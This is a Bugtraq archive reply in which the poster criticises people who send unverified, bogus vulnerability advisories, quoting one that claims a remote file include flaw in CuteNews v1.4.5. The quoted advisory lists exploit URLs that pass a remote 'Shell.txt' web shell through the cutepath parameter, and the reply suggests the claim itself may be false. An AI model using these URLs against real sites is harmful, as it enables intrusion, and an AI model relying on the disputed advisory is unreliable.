Bugtraq mailing list archives
Re: CuteNews v1.4.5 (search.php) Remote file include vulnerability
From: raven <locrideweb () libero it>
Date: Tue, 28 Nov 2006 11:58:46 +0100
The question is: why do those who "find" a vuln not check that it is really a vuln? Sending fake vuln advisories is stupid and useless... for me... Bugtraq is a security mailing list, and those who post there need to guarantee that it is a real mistake. I can't believe that every time anyone sends something, another person writes: "It is bogus", "It is not a real vulnerability" or something like this...
Posters, check what you find before sending it here.
Regards,
Francesco Vollero

philip anselmo wrote:
Title : CuteNews v1.4.5 (search.php) Remote file include
###############################################################################
Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}
------------------------------------------------------------------------
Source Code:
**********
http://cutephp.com/

Affected software description :
******************************
vendor site: http://cutephp.com/
Application : CuteNews v1.4.5
Category : Remote File Include
------------------------------------------------------------------------
Vulnerable Code:
***************
require_once("$cutepath/inc/functions.inc.php");
require_once("$cutepath/data/config.php");

affected file: search.php & show_news.php & show_archives.php
----------------------------------------------------------------------
Exploit:
*******
http://www.VicTim.com/[Script_Path]/show_archives.php?cutepath=Shell.txt?
http://www.VicTim.com/[Script_Path]/show_news.php?cutepath=Shell.txt?
http://www.VicTim.com/[Script_Path]/search.php?cutepath=Shell.txt?
------------------------------------------------------------------------
greetz: Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-all my friends
Special Greeting: AsbMay's Group & TrYaG TeaM
channel: www.asb-may.net & www.tryag.com
contact: spoonman500[at]hotmail[dot]com / ThE-LoRd-Of-CrAcKiNg () hotmail com